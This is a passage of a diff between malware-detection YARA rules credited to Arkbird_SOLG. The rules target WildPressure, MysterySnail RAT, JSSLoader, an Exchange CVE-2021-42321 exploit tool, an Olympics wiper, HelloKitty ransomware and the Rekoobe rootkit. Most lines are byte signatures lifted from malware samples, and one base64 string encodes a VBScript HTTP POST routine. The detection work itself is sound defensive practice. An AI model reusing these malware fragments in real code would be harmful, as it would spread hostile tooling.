adversary = "WildPressure" strings: - $s1 = { 0a 6f 70 74 20 25 6c 75 28 25 6c 75 29 20 73 74 61 74 20 25 6c 75 28 25 6c 75 29 20 73 74 6f 72 65 64 20 25 6c 75 20 6c 69 74 20 25 75 20 64 69 73 74 20 25 75 } - $s2 = { 0a 6c 61 73 74 5f 6c 69 74 20 25 75 2c 20 6c 61 73 74 5f 64 69 73 74 20 25 75 2c 20 69 6e 20 25 6c 64 2c 20 6f 75 74 20 7e 25 6c 64 28 25 6c 64 25 25 29 } - $s3 = { 70 65 6e 53 43 4d 61 6e 61 67 65 72 20 66 61 69 6c 65 64 20 28 25 64 29 0a } - $s4 = { 43 72 65 61 74 65 53 65 72 76 69 63 65 20 66 61 69 6c 65 64 20 28 25 64 29 0a 00 00 00 00 00 00 53 65 72 76 69 63 65 20 69 6e 73 74 61 6c 6c 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 0a } - $s5 = { 49 8b cd ff 15 56 22 07 00 c6 05 87 7b 0a 00 00 c7 05 81 7b 0a 00 60 ea 00 00 49 83 c9 ff 45 33 c0 48 8d 55 20 48 8d 0d f3 7b 0a 00 e8 26 a4 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 00 48 8d 0d bc 7b 0a 00 e8 0f a4 ff ff 41 b8 07 00 00 00 48 8d 15 92 b8 08 00 48 8d 0d 03 7c 0a 00 e8 16 a3 ff ff 49 83 c9 ff 45 33 c0 48 8d 55 40 48 8d 0d 6c 7b 0a 00 e8 df a3 ff ff 41 b8 ?? 00 00 00 48 8d 15 6a b8 08 00 48 8d 0d 13 7c 0a 00 e8 e6 a2 ff ff 48 8d 1d 0f 7d 0a 00 48 8b c3 48 83 3d 1c 7d 0a 00 08 48 0f 43 05 fc 7c 0a 00 48 89 44 24 58 48 8d 05 a0 03 00 00 48 89 44 24 60 48 89 7c 24 68 48 89 7c 24 70 48 8d 4c 24 58 ff 15 4e 21 07 00 85 c0 75 29 48 83 3d e2 7c 0a 00 08 48 0f 43 1d c2 7c 0a 00 48 8b d3 33 c9 ff 15 37 21 07 00 48 85 c0 74 09 48 8b c8 ff 15 f1 20 07 00 83 7c 24 30 02 7f 5d 48 8d 44 24 48 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 0a 71 ff ff 33 d2 33 c9 ff 15 60 22 07 00 48 8d 44 24 50 48 89 44 24 28 89 7c 24 20 45 33 c9 4c 8d 05 a8 95 ff ff 33 d2 33 c9 ff 15 3e 22 07 00 83 ca ff 48 8b c8 ff 15 f2 20 07 00 b9 64 00 00 00 ff 15 47 22 07 } - $s6 = { 48 89 7d f0 48 89 7d f8 45 33 c0 33 d2 48 8d 4d e0 e8 43 a7 ff ff 41 b8 2c 00 00 00 48 8d 15 be bc 08 00 48 8d 4d e0 e8 ad a7 ff ff 48 89 7d 70 48 89 7d 78 45 33 c0 33 d2 48 8d 4d 60 e8 17 a7 ff ff 45 33 c0 48 8d 15 77 94 08 00 48 8d 4d 60 e8 84 a7 ff ff 83 7c 24 30 02 75 6e 48 8d 85 a8 00 00 00 48 89 85 a0 00 00 00 41 b8 03 00 00 00 49 8b 55 08 48 8d 8d a0 00 00 00 e8 c9 0a 00 00 48 8b 95 a0 00 00 00 48 8d 4d a0 e8 89 a5 ff ff 48 8d 85 a8 00 00 00 48 8b 8d a0 00 00 48 89 85 b0 10 00 00 48 8b da 48 8b f9 33 f6 89 74 24 78 c7 45 80 18 00 00 00 c7 45 90 01 00 00 00 48 89 75 88 45 33 c9 4c 8d 45 80 48 8d 54 24 68 48 8d 4c 24 60 ff 15 81 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 60 ff 15 68 fe 06 00 45 33 c9 4c 8d 45 80 48 8d 54 24 70 48 8d 4c 24 58 ff 15 59 fe 06 00 45 33 c0 8d 56 01 48 8b 4c 24 58 ff 15 40 fe 06 00 33 c0 48 89 45 98 48 89 45 a0 48 89 45 a8 33 d2 44 8d 46 68 48 8d 4d c0 e8 ab 89 04 00 c7 45 c0 68 00 00 00 48 8b 44 24 68 48 89 45 20 48 8b 44 24 70 48 89 45 18 81 4d fc 00 01 00 00 48 8b d3 48 8d 4d 30 e8 bf fe ff ff 90 4c 8b c0 48 8d 8d 90 00 00 00 e8 9f 0d 00 00 90 45 33 c0 b2 01 48 8d 4d 30 e8 d0 7d ff ff 48 8d 95 90 00 00 00 48 83 bd a8 00 00 00 08 48 0f 43 95 90 00 00 00 48 8d 45 98 48 89 44 24 48 48 8d 45 c0 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 a7 fd 06 00 48 8b 4c 24 68 ff 15 94 fd 06 00 48 8b 4c 24 70 ff 15 89 fd 06 00 48 89 b5 80 00 00 00 48 89 b5 88 00 00 00 } + $s1 = { 52 00 4f 00 4f 00 54 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 00 65 00 6c 00 65 00 63 00 74 00 20 [3-7] 20 00 46 00 72 00 6f 00 6d 00 20 00 41 00 6e 00 74 00 69 00 56 00 69 00 72 00 75 00 73 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 20 00 57 00 48 00 45 00 52 00 45 00 20 00 64 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 20 00 3c 00 3e 00 27 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 44 00 65 00 66 00 65 00 6e 00 64 00 65 00 72 00 27 } + $s2 = "c1VybCA9IHt1fQ0Kc1JlcXVlc3QgPSB7cH0NCkhUVFBQb3N0IHNVcmwsIHNSZXF1ZXN0DQpGdW5jdGlvbiBIVFRQUG9zdChzVXJsLCBzUmVxdWVzdCkNCiAgc2V0IG9IVFRQID0gQ3JlYXRlT2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpDQogIG9IVFRQLm9wZW4gIlBPU1QiLCBzVXJsLGZhbHNlDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZXF1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogIFdzY3JpcHQuRWNobyBvSFRUUC5yZXNwb25zZVRleHQNCiAgSFRUUFBvc3QgPSBvSFRUUC5yZXNwb25zZVRleHQNCiBFbmQgRnVuY3Rpb24=" fullword ascii + $s3 = { 46 49 4c 45 20 48 41 4e 44 45 4c 20 4e 4f 54 20 46 4f 55 4e 44 00 00 00 4e 4f 20 44 61 74 61 00 } + $s4 = { 28 00 77 00 73 00 33 00 32 00 29 00 65 00 79 00 4a 00 73 00 62 00 32 00 35 00 6e 00 64 00 32 00 46 00 70 00 64 00 43 00 49 00 36 00 49 00 6a 00 } + $s5 = { 55 8b ec 6a ff 68 [3] 00 64 a1 00 00 00 00 50 83 ec 24 a1 [3] 00 33 c5 89 45 f0 ?? 57 50 8d 45 f4 64 a3 00 00 00 00 [8] b9 0f 00 00 00 89 4e } + $s6 = { 20 2f 63 20 [0-1] 46 4f 52 20 2f 6c 20 25 69 20 69 6e 20 28 31 2c 31 2c [1-4] 29 20 44 4f 20 49 46 20 4e 4f 54 20 45 58 49 53 54 20 22 00 22 29 } + $s7 = { 83 c4 0c 8d 95 44 fe ff ff 52 c7 85 44 fe ff ff 14 01 00 00 ff 15 [3] 00 83 bd 48 fe ff ff 06 7d 17 bf [3] 00 89 bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 eb 1a c7 85 ?? fe ff ff [3] 00 8b bd ?? fe ff ff c7 85 ?? fe ff ff [3] 00 } + $s8 = { 8b 45 08 50 68 bc 78 45 00 68 d0 78 45 00 8d 8d d0 fc ff ff 51 ff d6 83 c4 10 8b 3d a0 e0 44 00 8b 35 c4 e0 44 00 8d 64 } condition: - uint16(0)==0x5a4d and filesize >80KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize >40KB and 5 of ($s*) } -rule ARKBIRD_SOLG_EXP_CVE_2021_42321_Nov_2021_1 : CVE_2021_42321 FILE +rule ARKBIRD_SOLG_WIP_Unk_Wiper_July_2021_1 : FILE { meta: - description = "Detect CVE-2021-42321 exploit tool" + description = "Detect unknown wiper that focuses olympic games in Japan" author = "Arkbird_SOLG" - id = "2efd58a1-e5c3-5596-b5fd-f6e2fe0ab620" - date = "2021-11-21" - modified = "2021-11-21" - reference = "https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-21/EXP_CVE_2021_42321_Nov_2021_1.yara#L1-L19" + id = "a03d558e-399a-506e-8f37-d4907cc68d54" + date = "2021-07-22" + modified = "2021-07-22" + reference = "https://www.mbsd.jp/research/20210721/blog/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-22/WIP_Unk_Wiper_July_2021_1.yara#L1-L29" license_url = "N/A" - logic_hash = "bf45f240875f3c3ab729fe623b6c97d0540c0d7d3e9b2e4beb88af6922f8a643" - score = 50 - quality = 67 - tags = "CVE-2021-42321, FILE" - hash1 = "537744916ce2e78748d301901c679307e8159101f3b194add89f6e1dfbf62c32" - tlp = "white" - level = "Experimental" - adversary = "-" + logic_hash = "32f66fee2547ef33121620b822f86bfdf66ff337909a56aa4f0e8ef83b6d7730" + score = 75 + quality = 40 + tags = "FILE" + hash1 = "295d0aa4bf13befebafd7f5717e7e4b3b41a2de5ef5123ee699d38745f39ca4f" + hash2 = "511fee839098dfa28dd859ffd3ece5148be13bfb83baa807ed7cac2200103390" + tlp = "green" + adversary = "Olympic Destroyer ?" strings: - $s1 = { 41 41 45 41 41 41 44 2f 2f 2f 2f 2f 41 51 41 41 41 41 41 41 41 41 41 4d 41 67 41 41 41 46 35 4e 61 57 4e 79 62 } - $s2 = "/ews/exchange.asmx" ascii - $s3 = { 48 74 74 70 4e 74 6c 6d 41 75 74 68 28 27 25 73 27 20 25 20 28 55 53 45 52 29 } - $s4 = { 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 45 78 63 68 61 6e 67 65 53 65 72 76 69 63 65 73 43 6c 69 65 6e 74 } - $s5 = { 6d 56 6a 64 45 52 68 64 47 46 51 63 6d 39 32 61 57 52 6c 63 6a 34 4e 43 69 41 67 49 43 41 38 54 32 4a 71 5a 57 4e 30 52 47 46 30 59 56 42 79 62 33 5a 70 5a 47 56 79 49 48 67 36 53 32 56 35 50 53 4a 7a 5a 58 52 4e 5a 58 52 6f 62 32 51 69 49 45 39 69 61 6d 56 6a 64 45 6c 75 63 33 52 68 62 6d 4e 6c 50 53 4a 37 65 44 70 54 64 47 46 30 61 57 4d 67 59 7a 70 44 62 32 35 6d 61 57 64 31 63 6d 46 30 61 57 } + $s1 = "\\\\.\\Global\\ProcmonDebugLogger" fullword ascii + $s2 = { 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 00 00 00 00 4f 6c 6c 79 44 62 67 } + $s3 = { 8d 44 24 10 50 ff 15 08 30 40 00 50 ff 15 2c 30 40 00 83 7c 24 10 00 0f 85 76 02 00 00 33 c9 0f 1f } + $s4 = { 50 68 00 12 40 00 ff 15 60 30 40 00 85 c0 0f 85 ef 02 00 00 50 68 80 00 00 00 6a 03 50 6a 07 68 00 00 00 80 68 0c 32 40 00 ff 15 18 30 40 00 83 } + $s5 = { 8b 3d d0 30 40 00 88 84 0c e8 00 00 00 8d 84 24 e8 00 00 00 50 ff d7 83 c4 04 b0 9a 33 c9 0f 1f 00 f6 d0 88 84 0c b4 00 00 00 41 8a 81 30 32 40 } + $s6 = { 8b ec 83 ec 14 83 65 f4 00 8d 45 f4 83 65 f8 00 50 ff 15 34 30 40 00 8b 45 f8 33 45 f4 89 45 fc ff 15 38 30 40 00 31 45 fc ff 15 3c 30 40 00 31 45 fc 8d 45 ec 50 ff 15 40 30 40 00 8b 45 f0 8d 4d fc 33 45 ec 33 45 fc 33 } + $p1 = { 5c 2e 5c 47 6c 6f 62 61 6c 5c 35 84 44 65 62 75 67 4c 6f 67 67 3f } + $p2 = "UPX" fullword ascii + $p3 = { 45 6e 75 6d 57 69 6e 64 6f 77 73 } + $p4 = { 73 65 74 5f 6e 65 77 5f 6d 6f 64 65 00 00 00 5f 63 6f 6e 66 69 67 74 68 72 65 61 64 6c 6f 63 61 6c 65 } + $p5 = { 4e 75 74 6f 72 75 6e 2f 43 4e 65 74 } + $p6 = { 44 50 52 4f 43 4d 4f 4e 5f 57 49 4e 44 4f 57 5f 43 4c 41 53 53 } + $p7 = { 53 6d 61 72 74 53 6e 69 66 66 67 } + $p8 = { 26 30 30 63 66 67 } + $p9 = { 72 6f 63 65 94 48 61 63 6b } condition: - filesize >3KB and 4 of them + uint16(0)==0x5a4d and filesize >200KB and (5 of ($s*) or 7 of ($p*)) } -rule ARKBIRD_SOLG_MAL_Mysterysnail_RAT_Oct_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_ELF_Hellokitty_Aug_2021_1 : FILE { meta: - description = "Detect MysterySnaial RAT implant" + description = "Detect HelloKitty ransomware" author = "Arkbird_SOLG" - id = "2fa5015a-144f-52f6-8a5f-28fce10861e3" - date = "2021-10-13" - modified = "2021-10-14" - reference = "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-14/MAL_MysterySnail_RAT_Oct_2021_1.yara#L1-L25" + id = "3e83f07a-0ee7-5381-9aba-2606c01b9d91" + date = "2021-08-14" + modified = "2021-08-14" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-14/HelloKitty/RAN_ELF_HelloKitty_Aug_2021_1.yara#L1-L17" license_url = "N/A" - logic_hash = "bcf072fae02b479084b8d47b4cd676216f72aecfa4ebcf8226b6997839929b57" - score = 50 + logic_hash = "99816756ea0a680eb25da192c9f069082f6479befe4e50188ad8f90b323d1f2d" + score = 75 quality = 75 tags = "FILE" - hash1 = "e84be291efadd53a8bb965bfb589590ffe870da9187e6752cc7a9f028053ff5d" - hash2 = "b7fb3623e31fb36fc3d3a4d99829e42910cad4da4fa7429a2d99a838e004366e" - hash3 = "73f520223a2e01c036a4b620c7188e733c113a429e25c5c3de7fbbc1c3d16ccc" - level = "experimental" + hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041" + hash2 = "b4f90cff1e3900a3906c3b74f307498760462d719c31d008fc01937f5400fb85" tlp = "White" - adversary = "MysterySnail" + adversary = "RAAS" strings: - $s1 = { 57 48 83 ec 20 4c 8b c2 33 f6 0f b6 d1 41 b1 01 8b c2 c1 e8 04 41 84 c1 75 53 4d 85 c0 74 47 41 0f b7 08 8d 41 bf 66 83 f8 19 76 0a 66 83 e9 61 66 83 f9 19 77 08 66 41 83 78 02 3a 74 03 44 8a ce 45 84 c9 49 8d 40 04 49 8b c8 48 0f 45 c8 66 39 31 74 19 66 83 39 5c 74 06 66 83 39 2f 75 06 66 39 71 02 74 07 bb 00 80 00 00 eb 05 bb 40 40 00 00 66 c1 e2 07 b8 80 00 00 00 66 f7 d2 66 23 d0 b8 00 01 00 00 66 0b d0 66 0b da 4d 85 c0 74 65 ba 2e 00 00 00 49 8b c8 e8 64 4b 01 00 48 8b f8 48 85 c0 74 50 48 8d 15 a9 0d 09 00 48 8b c8 e8 5d dd 00 00 85 c0 74 39 48 8d 15 a6 0d 09 00 48 8b cf e8 4a dd 00 00 85 c0 74 26 48 8d 15 a3 0d 09 00 48 8b cf e8 37 dd 00 00 85 c0 74 13 48 8d 15 a0 0d 09 00 48 8b cf e8 24 dd 00 00 85 c0 75 04 66 83 cb 40 48 8b 74 24 38 0f b7 c3 66 c1 e8 03 66 83 e0 38 66 0b d8 0f b7 c3 66 c1 e8 06 66 83 e0 07 66 0b c3 48 8b 5c 24 30 } - $s2 = { 4c 8d 0d 6e 96 09 00 48 89 44 24 20 44 8b c7 48 8d 15 a7 62 0d 00 48 8b ce e8 47 17 fb ff 85 c0 0f 8e 83 00 00 00 4c 8d 0d 48 96 09 00 44 8b c7 48 8d 15 36 59 0d 00 48 8b ce e8 26 17 fb ff 85 c0 7e 66 49 8b 46 10 8b 08 81 f9 0a 04 00 00 74 1b 81 f9 3f 04 00 00 74 13 81 f9 0b 04 00 00 44 8b c3 41 0f } - $s3 = { 25 2a 73 70 75 62 3a 0a } - $s4 = { 48 81 ec b0 02 00 00 48 8b 05 7a e9 7b 00 48 33 c4 48 89 84 24 a0 02 00 00 48 8b ea 48 8d 44 24 38 48 8d 15 c0 a1 79 00 48 89 44 24 20 41 b9 01 00 00 00 45 33 c0 48 c7 c1 01 00 00 80 ff 15 3d 94 71 00 85 c0 75 53 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 84 24 d0 01 00 00 c7 44 24 34 01 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 e6 a1 79 00 c7 44 24 30 c7 00 00 00 ff 15 00 94 71 00 85 c0 75 0e 8b 84 24 d0 01 00 00 89 45 68 85 c0 75 07 33 c0 e9 eb 00 00 00 83 f8 01 75 f4 33 d2 48 8d 4c 24 40 41 b8 90 01 00 00 e8 f0 82 6f 00 48 8b 4c 24 38 48 8d 44 24 30 48 89 44 24 28 4c 8d 4c 24 34 48 8d 44 24 40 c7 44 24 30 c8 00 00 00 45 33 c0 48 89 44 24 20 48 8d 15 90 a1 79 00 ff 15 9a 93 71 00 85 c0 75 a8 33 f6 8b fe 8b de 66 83 7c 5c 40 3a 74 15 48 83 fb 64 74 94 ff c7 48 ff c3 48 83 fb 64 7c e7 33 c0 eb 77 48 63 c7 48 8d 4c 24 42 4c 89 b4 24 d0 02 00 00 4c 8d 34 00 49 03 ce e8 2f ad 6f 00 89 45 64 49 81 } - $s5 = { 48 8d 4c 24 60 ff 97 18 04 00 00 33 f6 c7 45 90 01 00 00 00 0f 57 c0 48 89 74 24 68 33 c9 66 0f 7f 44 24 70 48 89 75 80 48 89 75 88 c7 45 94 01 00 00 00 48 c7 45 9c 01 00 00 00 48 89 75 a8 e8 32 97 6f 00 8d 4e 01 48 89 45 b0 e8 26 97 6f 00 8d 4e 02 48 89 45 b8 e8 1a 97 6f 00 48 89 45 c0 45 33 c9 48 8d 45 d0 45 33 c0 48 89 44 24 48 48 8b d3 48 8d 44 24 60 33 c9 48 89 44 24 40 48 89 74 24 38 48 89 74 24 30 89 74 24 28 c7 44 24 20 01 00 00 00 ff 97 90 03 00 00 85 c0 74 0a 48 8b 4d d8 ff 15 da 8f 71 00 48 8b 4d d0 ff 15 d0 8f 71 00 b9 10 27 00 00 ff 15 b5 8f 71 00 0f 10 05 96 9c 79 00 48 8d 4d 08 33 d2 f2 0f 10 0d 98 9c 79 00 41 b8 b8 07 00 00 0f 29 45 f0 f2 0f 11 4d 00 e8 84 7d 6f 00 4c 8d 05 65 9c 79 00 48 8d 55 f0 48 8d 4c 24 58 e8 c3 98 6f 00 85 c0 0f 85 af 00 00 00 48 8b 4c 24 58 44 8d 40 02 33 d2 e8 db aa 6f 00 48 8b 4c 24 58 e8 71 94 6f 00 48 8b 4c 24 58 45 33 c0 33 d2 48 63 d8 e8 bf aa 6f 00 8d 4b 01 48 63 c9 e8 d4 67 6f 00 4c 8b 4c 24 58 4c 8b c3 ba 01 00 00 00 48 8b c8 48 8b f0 e8 58 f5 6f 00 48 8b 4c 24 58 48 8b d8 e8 47 99 6f 00 b9 64 00 00 00 ff 15 08 8f 71 00 48 83 bf f0 03 00 00 00 75 11 b9 42 6e aa cf e8 8c e7 ff ff 48 89 87 f0 03 00 00 48 8d 4d f0 ff 97 f0 03 00 00 44 8b cb 89 5c 24 50 4c 8b c6 48 8d 54 24 50 49 8b ce e8 44 d7 5c 00 48 8b ce 85 } + $seq1 = { 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 14 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 3d ?? 14 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 12 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 05 [2] 21 00 b9 ?? 0c 41 00 ba 80 00 00 00 be 01 00 00 00 4c 89 e7 48 8b 04 18 44 8b 00 31 c0 e8 ?? e5 ff ff 4c 89 e7 e8 cd 10 00 00 48 85 c0 49 89 c7 0f 84 9b 00 00 00 48 83 3d ?? 13 21 00 00 74 60 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 ?? e3 ff ff 48 8b 05 ?? 12 21 00 48 8b 3d ?? 13 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff 48 8b 3d ?? 13 21 00 e8 ?? e6 ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 12 21 00 48 8b 3d [2] 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff } + $seq2 = { 31 c0 b9 40 00 00 00 48 89 ef f3 ab be ?? 0d 41 00 48 89 df e8 [2] ff ff 48 85 c0 49 89 c5 0f 84 4c 01 00 00 48 89 c2 48 89 de 48 89 ef 48 29 da e8 71 07 00 00 be 3a 00 00 00 48 89 ef e8 [2] ff ff 48 8d 78 01 e8 [2] ff ff 85 c0 41 89 c7 0f 84 04 01 00 00 bf 10 00 00 00 e8 ?? dd ff ff 4c 89 ef 44 89 38 49 89 c6 48 89 04 24 e8 3d f5 ff ff 48 83 3d ?? 0e 21 00 00 49 89 46 08 74 6f 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d ?? 0d 21 00 ba ?? 0d 41 00 48 2b 0d ?? 0d 21 00 48 8b 3d ?? 0e 21 00 be 01 00 00 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 ?? dc ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d [2] 21 00 be 01 00 00 00 48 2b 0d [2] 21 00 48 8b 3d ?? 0c 21 00 ba ?? 0d 41 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 [2] ff ff 48 8b 35 [2] 21 00 48 3b 35 [2] 21 00 74 16 48 85 f6 74 07 48 8b 04 24 48 89 06 48 83 05 [2] 21 00 08 eb 0d 48 89 e2 bf e0 49 61 00 e8 af 02 00 00 48 8d 7b 01 be ?? 0d 41 00 e8 ?? dd ff ff 48 89 c3 e9 86 fe ff ff 4d 85 e4 74 08 4c 89 e7 e8 [2] ff ff 48 83 3d ?? 0d 21 00 00 74 61 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d ?? 0c 21 00 ba ?? 0d 41 00 48 8b 3d ?? 0d 21 00 be 01 00 00 00 31 c0 48 c1 f9 03 e8 ?? db ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d [2] 21 00 31 c0 48 8b 3d ?? 0b 21 00 ba ?? 0d 41 00 be 01 00 00 00 48 c1 f9 03 e8 [2] ff ff 48 8b 84 24 18 01 00 00 64 48 33 04 25 28 00 00 } + $seq3 = { 48 8d b4 24 90 00 00 00 bf d0 4a 61 00 48 c7 84 24 98 00 00 00 00 00 00 00 48 c7 84 24 90 00 00 00 01 00 00 00 e8 [2] ff ff e8 ?? 22 00 00 89 44 24 08 8b 05 [2] 21 00 89 d9 44 8b 0d [2] 21 00 44 8b 05 [2] 21 00 ba ?? 0e 41 00 48 8b 3d [2] 21 00 be 01 00 00 00 89 04 24 31 c0 e8 ?? f8 ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 31 f6 ba 0a 00 00 00 bf 40 4a 61 00 e8 ?? fa ff ff ba 0a 00 00 00 31 f6 bf 20 4a 61 00 e8 ?? fa ff ff be 01 00 00 00 bf 11 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 14 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 16 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 15 00 00 00 e8 [2] ff ff 83 3d ?? 28 21 00 00 } condition: - uint16(0)==0x5A4D and filesize >500KB and all of ($s*) + uint32(0)==0x464C457F and filesize >20KB and all of ($seq*) } -rule ARKBIRD_SOLG_MAL_Jssloader_Jun_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_ELF_Rekoobe_Nov_2021_1 : FILE { meta: - description = "Detect JSSLoader malware" + description = "Detect the Rekoobe rootkit" author = "Arkbird_SOLG" - id = "192b1386-f0bc-54e8-9341-84f77f4f07c5" - date = "2021-06-04" - modified = "2021-06-05" + id = "a5b200f1-cbb7-5106-8127-74abd3cde061" + date = "2021-11-10" + modified = "2021-11-11" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-04/FIN7/MAL_JSSLoader_Jun_2021_1.yara#L1-L20" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-10/MAL_ELF_Rekoobe_Nov_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "73942afed6b3471be07be1fba3e7f90ec7f2377a1167aeef70627cd07faa3681" + logic_hash = "bde3d1a3d2d2e9efd4b7c68f69dce40d5e0f01d41885481730d8a7fa67cbab7e" score = 75 - quality = 75 + quality = 73 tags = "FILE" - hash1 = "59c6acc8f6771ea6eeb8d8f03832642d87f9aa7eb0c3205398d31ad08e019a9c" - hash2 = "2609c6ec5d4fdde28d29c272484da66e0995e529cf302ed46f94c68cd99352e3" - hash3 = "ea167f5460c5f920699e276fb0c51f32c862256415c57edb4bda5760a70b9e4d" - hash4 = "822457c427a0776b41dd8f3479070e56fdd53ccd0175418d4e7d85065ec7d7d1" - tlp = "White" - adversary = "FIN7" + hash1 = "bf09a1a7896e05b18c033d2d62f70ea4cac85e2d72dbd8869e12b61571c0327e" + hash2 = "e1999a3e5a611312e16bb65bb5a880dfedbab8d4d2c0a5d3ed1ed926a3f63e94" + tlp = "white" + adversary = "-" strings: - $s1 = { 8b 45 c8 83 78 0c 00 0f 84 ce 00 00 00 8b 45 c8 8b 4d 08 03 48 0c 8b f4 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 bc 83 7d bc 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d 08 03 48 10 89 4d f8 8b 45 c8 8b 4d 08 03 08 89 4d ec 8b 45 ec 3b 45 08 75 06 8b 45 f8 89 45 ec 8b 45 ec 83 38 00 74 6c 8b 45 ec 8b 08 81 e1 00 00 00 } - $s2 = { 8b f4 6a 04 68 00 10 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 f8 83 7d f8 00 75 05 e9 a7 00 00 00 8b 45 c8 8b 4d c8 8b 50 04 2b 11 52 8b 45 c8 8b 08 51 8b 55 f8 52 e8 [2] 00 00 83 c4 0c 8b f4 8b 45 f8 50 8b fc ff 15 [3] 00 3b fc e8 [2] 00 00 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 8b f4 6a 04 68 00 10 00 00 68 00 11 00 00 6a 00 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 ec 83 7d ec 00 75 02 eb 3e 8b 45 c8 8b 48 08 8b 11 89 55 e0 83 7d e0 ff 75 0c c7 85 00 ff ff ff 00 00 00 00 eb 09 8b 45 e0 89 85 00 ff ff ff 8b 8d 00 ff ff ff 8b 55 ec 8b 45 f8 89 04 8a 8b 45 ec 64 a3 2c 00 00 00 5f 5e 5b 81 c4 00 01 00 00 3b ec e8 [2] 00 00 8b e5 5d } - $s3 = { c7 45 f0 61 00 00 00 c7 45 c8 20 00 00 00 c7 45 cc 88 00 00 00 c7 45 dc 01 00 00 00 8d 45 f0 89 45 d0 33 c0 66 89 45 d4 c7 45 d8 00 00 00 00 c7 45 e0 00 00 00 00 8b 45 08 89 45 e4 8b f4 8d 45 c8 50 ff 15 [3] 00 3b f4 e8 [2] 00 00 89 45 b0 83 7d b0 ff 74 17 8b f4 8d 45 bc 50 8b 4d b0 51 ff 15 [3] 00 3b f4 e8 [2] 00 00 52 8b cd 50 8d 15 2c 13 40 00 e8 [2] 00 00 58 5a 5f 5e 5b 8b 4d fc 33 cd e8 [2] 00 00 